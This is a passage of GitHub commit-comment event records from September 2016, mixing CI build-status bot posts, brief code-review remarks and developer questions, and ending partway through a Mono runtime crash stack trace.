{"id":"4611894101","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19156198,"position":null,"line":null,"path":null,"commit_id":"77595ff35ad3f9bbfc0bb7ca74e499ff94f81674","created_at":"2016-09-24T03:57:36Z","updated_at":"2016-09-24T03:57:36Z","body":"os_2_0_fix_static_build (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-24T03:57:36Z"}
{"id":"4611907899","type":"CommitCommentEvent","actor":{"login":"shivaq"},"repo":{"name":"shivaq/recipes"},"payload":{"comment":{"id":19156255,"position":null,"line":null,"path":null,"commit_id":"0dafa7b195ce0f6696f8f5b040d5209ea774a287","created_at":"2016-09-24T04:08:45Z","updated_at":"2016-09-24T04:08:45Z","body":"typo test"}},"created_at":"2016-09-24T04:08:45Z"}
{"id":"4611908293","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19156258,"position":58,"line":55,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T04:09:07Z","updated_at":"2016-09-24T04:09:07Z","body":"https://github.com/openzipkin/zipkin/pull/1311 has the fix!"}},"created_at":"2016-09-24T04:09:07Z"}
{"id":"4611908442","type":"CommitCommentEvent","actor":{"login":"adriancole"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19156260,"position":72,"line":67,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-24T04:09:14Z","updated_at":"2016-09-24T04:09:14Z","body":"https://github.com/openzipkin/zipkin/pull/1311 also fixes this"}},"created_at":"2016-09-24T04:09:14Z"}
{"id":"4611910199","type":"CommitCommentEvent","actor":{"login":"PineApple777"},"repo":{"name":"HYU-ICEWALL/blog"},"payload":{"comment":{"id":19156265,"position":null,"line":null,"path":null,"commit_id":"565df7f922d4631b64638a0d976603f01dade819","created_at":"2016-09-24T04:10:50Z","updated_at":"2016-09-24T04:10:50Z","body":"아;; 넹넹 다음에는 이슈로 달도록 하겠습니다 ㅠ"}},"created_at":"2016-09-24T04:10:50Z"}
{"id":"4611913207","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156281,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-24T04:13:45Z","updated_at":"2016-09-24T04:13:45Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T04:13:45Z"}
{"id":"4611913352","type":"CommitCommentEvent","actor":{"login":"fiowind"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19156282,"position":null,"line":null,"path":null,"commit_id":"d4a925a2569d9d1c9669ec2a64e8b7006be9e1ad","created_at":"2016-09-24T04:13:53Z","updated_at":"2016-09-24T04:13:53Z","body":"whether you forget to import createHistory, it will be warned in the history of 2.1.2"}},"created_at":"2016-09-24T04:13:53Z"}
{"id":"4611918299","type":"CommitCommentEvent","actor":{"login":"S0ULHACKZ"},"repo":{"name":"Hexeption/Minecraft-GUI-API-Update"},"payload":{"comment":{"id":19156317,"position":32,"line":32,"path":"org/darkstorm/minecraft/gui/component/Component.java","commit_id":"91c9a0f1a51ef4ddbac86afe09e253ed19953a7a","created_at":"2016-09-24T04:18:22Z","updated_at":"2016-09-24T04:18:22Z","body":"trol"}},"created_at":"2016-09-24T04:18:22Z"}
{"id":"4611919137","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19156321,"position":32,"line":698,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialListValueBox.java","commit_id":"d228fb3af14b2728ffcd98242976c089cd0da12e","created_at":"2016-09-24T04:19:00Z","updated_at":"2016-09-24T04:19:00Z","body":"corrected"}},"created_at":"2016-09-24T04:19:00Z"}
{"id":"4611919789","type":"CommitCommentEvent","actor":{"login":"jhstsr11690"},"repo":{"name":"jhstsr11690/FTC-Programming"},"payload":{"comment":{"id":19156322,"position":9,"line":8,"path":"javascripts/main.js","commit_id":"900d943a981ba9c784d02676b1dd74ec321591fd","created_at":"2016-09-24T04:19:33Z","updated_at":"2016-09-24T04:19:33Z","body":"Remove all\r\n"}},"created_at":"2016-09-24T04:19:33Z"}
{"id":"4611921719","type":"CommitCommentEvent","actor":{"login":"MikuAuahDark"},"repo":{"name":"MikuAuahDark/SIF_Win32"},"payload":{"comment":{"id":19156336,"position":null,"line":null,"path":null,"commit_id":"a700b8d237d8416bd31e759d0ca3155cffb9b081","created_at":"2016-09-24T04:21:18Z","updated_at":"2016-09-24T04:21:18Z","body":"Patch it. I can't tell you how to do it because security reason.\n24 Sep 2016 10.28, \"zhaoxile\" <notifications@github.com> menulis:\n\n> How to have a official client with XMS disabled? (Connect to private\n> server from mobile phone)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MikuAuahDark/SIF_Win32/commit/a700b8d237d8416bd31e759d0ca3155cffb9b081#commitcomment-19155754>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHJylk8UuWWeX7ARfzs_fb1IFZGqbx7kks5qtIqwgaJpZM4KFh1O>\n> .\n>\n"}},"created_at":"2016-09-24T04:21:18Z"}
{"id":"4611922152","type":"CommitCommentEvent","actor":{"login":"throwexceptions"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19156337,"position":null,"line":null,"path":null,"commit_id":"16856b96e56f2b5485bad1e66a6f27b9b9644383","created_at":"2016-09-24T04:21:42Z","updated_at":"2016-09-24T04:21:42Z","body":"Provide available settings for notify developers of Environment Settings."}},"created_at":"2016-09-24T04:21:42Z"}
{"id":"4611922881","type":"CommitCommentEvent","actor":{"login":"albertosalmeronunefa"},"repo":{"name":"albertosalmeronunefa/como_hacer_spaguetti"},"payload":{"comment":{"id":19156344,"position":null,"line":null,"path":null,"commit_id":"8a2fe4adab8f4f2baead86d2c263b7cd1e3a0c34","created_at":"2016-09-24T04:22:22Z","updated_at":"2016-09-24T04:22:22Z","body":"colocando la primera entrega del documento de evaluacion del primer corte "}},"created_at":"2016-09-24T04:22:22Z"}
{"id":"4611924647","type":"CommitCommentEvent","actor":{"login":"dwrensha"},"repo":{"name":"tokio-rs/tokio-core"},"payload":{"comment":{"id":19156357,"position":null,"line":null,"path":null,"commit_id":"5ab323e5c2cb76c49a3ec8b6d5857b03ebdf28be","created_at":"2016-09-24T04:24:07Z","updated_at":"2016-09-24T04:24:07Z","body":"@simnalamburt Then you get a panic, due to a `TaskRc` being accessed on the wrong task. See https://github.com/tokio-rs/tokio-core/issues/31 and https://github.com/alexcrichton/futures-rs/issues/148 for some discussion."}},"created_at":"2016-09-24T04:24:07Z"}
{"id":"4611926743","type":"CommitCommentEvent","actor":{"login":"testbug01"},"repo":{"name":"Berkeley-CS61B/skeleton-sp16"},"payload":{"comment":{"id":19156365,"position":1,"line":1,"path":"lab1/Year.java","commit_id":"934f328720890d7482ca797c8b7c589b58248873","created_at":"2016-09-24T04:26:10Z","updated_at":"2016-09-24T04:26:10Z","body":"what?"}},"created_at":"2016-09-24T04:26:10Z"}
{"id":"4611926920","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19156366,"position":null,"line":null,"path":null,"commit_id":"c1ad7a3ce12eae50e3d762862fa4281fe60134e9","created_at":"2016-09-24T04:26:18Z","updated_at":"2016-09-24T04:26:18Z","body":"Perhaps if not logged in, leave the button logic how it was, else if logged in show modal"}},"created_at":"2016-09-24T04:26:18Z"}
{"id":"4611927422","type":"CommitCommentEvent","actor":{"login":"dav79"},"repo":{"name":"dav79/demo_git"},"payload":{"comment":{"id":19156374,"position":2,"line":2,"path":"README.md","commit_id":"561efdca74c0cdb33f81e3b1652899eef1d67b1f","created_at":"2016-09-24T04:26:47Z","updated_at":"2016-09-24T04:26:47Z","body":"Faire les modifications de GitHub"}},"created_at":"2016-09-24T04:26:47Z"}
{"id":"4611930526","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19156388,"position":null,"line":null,"path":null,"commit_id":"598cd4c354b708bb3dbb0968b4157453b20d7a02","created_at":"2016-09-24T04:29:53Z","updated_at":"2016-09-24T04:29:53Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [EDIT MODE](https://trello.com/c/G99LoBIH/36-edit-mode)"}},"created_at":"2016-09-24T04:29:53Z"}
{"id":"4611930616","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19156390,"position":null,"line":null,"path":null,"commit_id":"d56e7953a441b692e3a49819ff7b2974d44072e9","created_at":"2016-09-24T04:29:58Z","updated_at":"2016-09-24T04:29:58Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [EDIT MODE](https://trello.com/c/G99LoBIH/36-edit-mode)"}},"created_at":"2016-09-24T04:29:58Z"}
{"id":"4611931822","type":"CommitCommentEvent","actor":{"login":"SuperXingKong"},"repo":{"name":"va2ron1/BigBrother"},"payload":{"comment":{"id":19156392,"position":null,"line":null,"path":null,"commit_id":"6703f1de47b796e66651ca44f3545f93f9e22b96","created_at":"2016-09-24T04:31:01Z","updated_at":"2016-09-24T04:31:01Z","body":"god job,i hope you can update:)"}},"created_at":"2016-09-24T04:31:01Z"}
{"id":"4611931892","type":"CommitCommentEvent","actor":{"login":"hlidotbe"},"repo":{"name":"epicagency/caddy-expires"},"payload":{"comment":{"id":19156393,"position":80,"line":80,"path":"expires.go","commit_id":"cb2ed464e061263893acfe4cdbcab6f54e244afc","created_at":"2016-09-24T04:31:06Z","updated_at":"2016-09-24T04:31:06Z","body":"It would be much easier but expiration length is usually at least in days, making it less clear what you intend to do. "}},"created_at":"2016-09-24T04:31:06Z"}
{"id":"4611935106","type":"CommitCommentEvent","actor":{"login":"huangkerui"},"repo":{"name":"huangkerui/react-basics"},"payload":{"comment":{"id":19156409,"position":null,"line":null,"path":null,"commit_id":"9b78ac0d5d1d153d6c41b3ddd0b17ebbb636a1a9","created_at":"2016-09-24T04:34:14Z","updated_at":"2016-09-24T04:34:14Z","body":"Install webpack dev-server by running `npm install --save webpack-dev-server` // actually we should use -g"}},"created_at":"2016-09-24T04:34:14Z"}
{"id":"4611940218","type":"CommitCommentEvent","actor":{"login":"Santikun"},"repo":{"name":"kivikakk/ifsexplorer"},"payload":{"comment":{"id":19156431,"position":null,"line":null,"path":null,"commit_id":"f1095ad2c73d2ebc7ffcf64933bf7d5b5e6106a5","created_at":"2016-09-24T04:38:52Z","updated_at":"2016-09-24T04:38:52Z","body":"I'm trying to extract SDVX II, but some textures appear kinda glitched like this. Is this supposed to happen?\r\n![glitch](https://cloud.githubusercontent.com/assets/22405218/18806128/9faf7034-81f7-11e6-9ce7-813c1ad5eb8d.png)\r\n"}},"created_at":"2016-09-24T04:38:52Z"}
{"id":"4611940986","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156433,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-24T04:39:37Z","updated_at":"2016-09-24T04:39:37Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (2337 of 2345 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T04:39:37Z"}
{"id":"4611944407","type":"CommitCommentEvent","actor":{"login":"REVENIN"},"repo":{"name":"REVENIN/fbcmd4j"},"payload":{"comment":{"id":19156443,"position":null,"line":null,"path":null,"commit_id":"cba3e0cc4bea58d6faf339ae6657f6180e7fa063","created_at":"2016-09-24T04:42:59Z","updated_at":"2016-09-24T04:42:59Z","body":"Archivo README.md con los siguientes elementos:\r\nInstalación\r\nUso\r\nCréditos\r\nLicencia"}},"created_at":"2016-09-24T04:42:59Z"}
{"id":"4611944910","type":"CommitCommentEvent","actor":{"login":"REVENIN"},"repo":{"name":"REVENIN/fbcmd4j"},"payload":{"comment":{"id":19156447,"position":1,"line":1,"path":"README.md","commit_id":"cba3e0cc4bea58d6faf339ae6657f6180e7fa063","created_at":"2016-09-24T04:43:31Z","updated_at":"2016-09-24T04:43:31Z","body":"Archivo README.md con los siguientes elementos:\r\nInstalación\r\nUso\r\nCréditos\r\nLicencia"}},"created_at":"2016-09-24T04:43:31Z"}
{"id":"4611945451","type":"CommitCommentEvent","actor":{"login":"onyb"},"repo":{"name":"samir-patnaik/UdacityCS253"},"payload":{"comment":{"id":19156450,"position":6,"line":52,"path":"webapp/Problem-Statement-3/simpleblog/main.py","commit_id":"dcabbc4cee4592e080c0a8d5e51c4775234bed99","created_at":"2016-09-24T04:44:03Z","updated_at":"2016-09-24T04:44:03Z","body":"@samir-patnaik I like the way we can unpack objects with the `*` and `**`. Look up related improvements to Python 3.5. :)"}},"created_at":"2016-09-24T04:44:03Z"}
{"id":"4611949084","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156464,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-24T04:47:53Z","updated_at":"2016-09-24T04:47:53Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-24T04:47:53Z"}
{"id":"4611949494","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156469,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-24T04:48:20Z","updated_at":"2016-09-24T04:48:20Z","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (1770 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.89%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T04:48:20Z"}
{"id":"4611949508","type":"CommitCommentEvent","actor":{"login":"rockyrmit"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19156470,"position":null,"line":null,"path":null,"commit_id":"243c9b8f382502c0dfcac5100c387a7a44491d1d","created_at":"2016-09-24T04:48:21Z","updated_at":"2016-09-24T04:48:21Z","body":"Hi @mortont - can you help provide some context how the seed wav form works? \r\ndoes it mean the the wavenet will generate a sound (trained by the existing corpus) with other speaker acoustic model? \r\nalso , what's the command line for the input - does it work with fast-wavenet implementation?\r\n\r\nthanks!\r\nRocky"}},"created_at":"2016-09-24T04:48:21Z"}
{"id":"4611950619","type":"CommitCommentEvent","actor":{"login":"pedroivo000"},"repo":{"name":"pedroivo000/BioreactorBrain"},"payload":{"comment":{"id":19156487,"position":null,"line":null,"path":null,"commit_id":"11ccd7836d721a14610d11461dccc6a687814de3","created_at":"2016-09-24T04:49:34Z","updated_at":"2016-09-24T04:49:34Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [I2C LCD screen connection](https://trello.com/c/ETafolg7/13-i2c-lcd-screen-connection)"}},"created_at":"2016-09-24T04:49:34Z"}
{"id":"4611952960","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19156497,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-24T04:51:55Z","updated_at":"2016-09-24T04:51:55Z","body":"Thanks, Joe! I think I'm going to use the slice API since that way the\ncaller can do stuff with the values.\n\nWhen are structs comparable? More specifically, I've defined a Node as:\n\ntype Node struct {\n    Value\n    parent, left, right *Node\n}\n\nwhere Value is any type that satisfies an interface containing a Less()\nmethod. Can I test whether *Node u is a left child by writing: \"if u ==\nu.parent.left\"? Or do I have to do the more verbose \"if\n!u.Value.Less(u.parent.left.Value) && !u.parent.left.Value.Less(u.Value)\"?\n\n\nOn Fri, Sep 23, 2016 at 3:31 PM, Joe Tsai <notifications@github.com> wrote:\n\n> I'll let you decide what is better API to use. They have advantages and\n> disadvantages, and I think it'll be good for your growth to evaluate them\n> each.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19152496>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib136ID7r_AlPV-nANsqvOGndx4p97ks5qtDcdgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-24T04:51:55Z"}
{"id":"4611955396","type":"CommitCommentEvent","actor":{"login":"tarunireddy"},"repo":{"name":"tarunireddy/Taruni-QA-Assignment"},"payload":{"comment":{"id":19156509,"position":null,"line":null,"path":null,"commit_id":"cd05c7d738479cf5aced71e6090f67d2d761c62a","created_at":"2016-09-24T04:54:19Z","updated_at":"2016-09-24T04:54:19Z","body":"[QA assignment 1.docx](https://github.com/tarunireddy/Taruni-QA-Assignment/files/490977/QA.assignment.1.docx)\r\n"}},"created_at":"2016-09-24T04:54:19Z"}
{"id":"4611958782","type":"CommitCommentEvent","actor":{"login":"Studio-XP"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19156531,"position":45,"line":285,"path":"templates/map.html","commit_id":"f6b94d94c5d69ce4b9b018e29bcbb47c4da1e946","created_at":"2016-09-24T04:57:37Z","updated_at":"2016-09-24T04:57:37Z","body":"Should probably use https://cdnjs.cloudflare.com/ajax/libs/datatables/1.10.12/js/jquery.dataTables.min.js instead"}},"created_at":"2016-09-24T04:57:37Z"}
{"id":"4611959405","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156536,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-24T04:58:14Z","updated_at":"2016-09-24T04:58:14Z","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T04:58:14Z"}
{"id":"4611960310","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19156539,"position":null,"line":null,"path":null,"commit_id":"243348e2b9bd4f4e638b1e6d5fa3aaecf5b7d0b5","created_at":"2016-09-24T04:59:13Z","updated_at":"2016-09-24T04:59:13Z","body":"Oh, that is *quite* weird indeed."}},"created_at":"2016-09-24T04:59:13Z"}
{"id":"4611965808","type":"CommitCommentEvent","actor":{"login":"Pysoy"},"repo":{"name":"Pysoy/hello-world"},"payload":{"comment":{"id":19156562,"position":null,"line":null,"path":null,"commit_id":"97b56add92dcacf0c4920479621d826e333615d4","created_at":"2016-09-24T05:04:13Z","updated_at":"2016-09-24T05:04:13Z","body":"#include <stdio.h>\r\n\r\nint main(int arg, char *args)\r\n{\r\n        return 0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-24T05:04:13Z"}
{"id":"4611968621","type":"CommitCommentEvent","actor":{"login":"perlundq"},"repo":{"name":"perlundq/yajsync"},"payload":{"comment":{"id":19156578,"position":null,"line":null,"path":null,"commit_id":"105d270ccc9f381694dcea690ed903fe82b9590c","created_at":"2016-09-24T05:07:12Z","updated_at":"2016-09-24T05:07:12Z","body":"Currently only jdk 7 is required. But I would like to be able to use some jdk 8 features to clean things up. I guess the only thing that would be a problem is Android's support for jdk 8, whichs looks a bit unclear to me."}},"created_at":"2016-09-24T05:07:12Z"}
{"id":"4611971653","type":"CommitCommentEvent","actor":{"login":"edghareii"},"repo":{"name":"lozpre/Practica3"},"payload":{"comment":{"id":19156597,"position":null,"line":null,"path":null,"commit_id":"d113fcaa4d43b0230d925bbfbd0a874beb606096","created_at":"2016-09-24T05:10:14Z","updated_at":"2016-09-24T05:10:14Z","body":"like"}},"created_at":"2016-09-24T05:10:14Z"}
{"id":"4611975283","type":"CommitCommentEvent","actor":{"login":"gangstara2"},"repo":{"name":"gangstara2/hanu-project"},"payload":{"comment":{"id":19156614,"position":null,"line":null,"path":null,"commit_id":"1f8469085b197c88b2794fc0b56a7bb1973d8cce","created_at":"2016-09-24T05:13:46Z","updated_at":"2016-09-24T05:13:46Z","body":"ô ơi, ô dùng câu lệnh: \r\n`git reset --hard f690426af20`\r\n sau đó\r\n`git pull origin master` \r\nđể lấy code mới nhất về sau đó mới code tiếp nhé,\r\n đứng ở thư mục hanu-project, và ở branch trungducng  ý "}},"created_at":"2016-09-24T05:13:46Z"}
{"id":"4611975554","type":"CommitCommentEvent","actor":{"login":"xieguigang"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19156616,"position":null,"line":null,"path":null,"commit_id":"112631f5c6926eb00544cd39f6be7a98983503b8","created_at":"2016-09-24T05:14:04Z","updated_at":"2016-09-24T05:14:04Z","body":"```\r\nLast login: Mon Sep 19 22:09:35 on ttys000\r\nYues-iMac:~ Yue$ cd /Users/Jobs/Downloads/GCModeller_3\r\nYues-iMac:GCModeller_3 Yue$ mono ./localblast.exe /Fasta.Filters /in /Volumes/Untitled/nt /key /Users/Jobs/Downloads/list_mos.txt\r\n[DEBUG 9/23/2016 9:17:57 PM] [\"africanus\",\"apicorgenteus\",\"opok\",\"dalzieli\",\"aegypti\",\"furcifer\",\"grahamii\",\"luteocephalus\",\"vittatus\",\"opock\",\"fowleri\",\"furcifer\\/taylori\",\"neoafricanus\",\"metallicus\",\"minutus\",\"Anopheles\",\"coustani\",\"gambiae\",\"s.l.\",\"hirsutus\",\"unilineatus\",\"Culex\",\"perfuscus\",\"\",\"(Fredwardsius)\",\"taylori\",\"Mansonia\",\"uniformis\",\"(Diceronyia)\",\"albopictus\",\"Field\",\"collected\",\"henselli\",\"and\",\"quinquefasciatus\",\"tested\",\"negative\",\"for\",\"ZIKV;\",\"laboratory\",\"infection\",\"Macaca\",\"Mulatta\"]\r\nShutting down finalizer thread timed out.\r\n* Assertion at gc.c:867, condition `finalizer_thread_exited' not met\r\n\r\nStacktrace:\r\n\r\n\r\nNative stacktrace:\r\n\r\n\t0   mono                                0x0000000109402a8a mono_handle_native_sigsegv + 282\r\n\t1   libsystem_platform.dylib            0x00007fff8f3dd5aa _sigtramp + 26\r\n\t2   ???                                 0x00007fc6b140b2e0 0x0 + 140491354059488\r\n\t3   libsystem_c.dylib                   0x00007fff8a746b1a abort + 125\r\n\t4   mono                                0x00000001095b215b monoeg_log_default_handler + 219\r\n\t5   mono                                0x00000001095b2062 monoeg_g_logv + 114\r\n\t6   mono                                0x00000001095b2478 monoeg_assertion_message + 360\r\n\t7   mono                                0x0000000109519ef2 mono_gc_cleanup + 930\r\n\t8   mono                                0x000000010951206e mono_runtime_cleanup + 14\r\n\t9   mono                                0x0000000109354901 mini_cleanup + 721\r\n\t10  mono                                0x00000001093ce60b mono_main + 8139\r\n\t11  mono                                0x0000000109347064 main + 1172\r\n\t12  libdyld.dylib                       0x00007fff90c045fd start + 1\r\n\r\nDebug info from gdb:\r\n\r\nlldb: error: couldn't open cache file '/var/folders/2z/2nybt7y11d1cxzpsz0r01xvm0000gn/T/xcrun_db' (errno=No such file or directory)\r\n(lldb) command source -s 0 '/tmp/mono-gdb-commands.jW7tUC'\r\nExecuting commands in '/private/tmp/mono-gdb-commands.jW7tUC'.\r\n(lldb) process attach --pid 60673\r\nProcess 60673 stopped\r\nExecutable module set to \"/usr/local/bin/mono\".\r\nArchitecture set to: x86_64-apple-macosx.\r\n(lldb) thread list\r\nProcess 60673 stopped\r\n* thread #1: tid = 0x8824bc, 0x00007fff906bbe20 libsystem_kernel.dylib`__wait4 + 8, name = 'tid_507', queue = 'com.apple.main-thread', stop reason = signal SIGSTOP\r\n  thread #2: tid = 0x8824c1, 0x00007fff906bb716 libsystem_kernel.dylib`__psynch_cvwait + 10\r\n  thread #3: tid = 0x8824c5, 0x00007fff906bc662 libsystem_kernel.dylib`kevent64 + 10, queue = 'com.apple.libdispatch-manager'\r\n(lldb) thread backtrace all\r\n* thread #1: tid = 0x8824bc, 0x00007fff906bbe20 libsystem_kernel.dylib`__wait4 + 8, name = 'tid_507', queue = 'com.apple.main-thread', stop reason = signal SIGSTOP\r\n  * frame #0: 0x00007fff906bbe20 libsystem_kernel.dylib`__wait4 + 8\r\n    frame #1: 0x0000000109402b21 mono`mono_handle_native_sigsegv(signal=<unavailable>, ctx=<unavailable>, info=<unavailable>) + 433 at mini-exceptions.c:2348\r\n    frame #2: 0x00007fff8f3dd5aa libsystem_platform.dylib`_sigtramp + 26\r\n    frame #3: 0x00007fff906bb867 libsystem_kernel.dylib`__pthread_kill + 11\r\n    frame #4: 0x00007fff8a746b1a libsystem_c.dylib`abort + 125\r\n    frame #5: 0x00000001095b215b mono`monoeg_log_default_handler(log_domain=0x0000000000000000, log_level=G_LOG_LEVEL_ERROR, message=0x00007fc6b16761e0, unused_data=0x0000000000000000) + 219 at goutput.c:233\r\n    frame #6: 0x00000001095b2062 mono`monoeg_g_logv(log_domain=0x0000000000000000, log_level=G_LOG_LEVEL_ERROR, format=0x00000001095e2680, args=0x00007fff568b97d0) + 114 at goutput.c:113\r\n    frame #7: 0x00000001095b2478 mono`monoeg_assertion_message(format=0x00000001095e2680) + 360 at goutput.c:133\r\n    frame #8: 0x0000000109519ef2 mono`mono_gc_cleanup [inlined] mono_os_sem_post + 930 at mono-os-semaphore.h:136\r\n    frame #9: 0x0000000109519ee7 mono`mono_gc_cleanup [inlined] mono_coop_sem_post at mono-coop-semaphore.h:64\r\n    frame #10: 0x0000000109519ee7 mono`mono_gc_cleanup [inlined] mono_gc_finalize_notify at gc.c:623\r\n    frame #11: 0x0000000109519ee7 mono`mono_gc_cleanup + 919 at gc.c:818\r\n    frame #12: 0x000000010951206e mono`mono_runtime_cleanup(domain=<unavailable>) + 14 at appdomain.c:356\r\n    frame #13: 0x0000000109354901 